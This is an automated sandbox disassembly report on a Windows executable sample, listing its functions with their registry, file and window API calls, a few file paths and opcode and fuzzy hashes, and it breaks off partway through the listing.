Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Unnumberable,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Iw\Unnumberable
API String ID: 1892508949-3164773890
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(0015A7DF,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
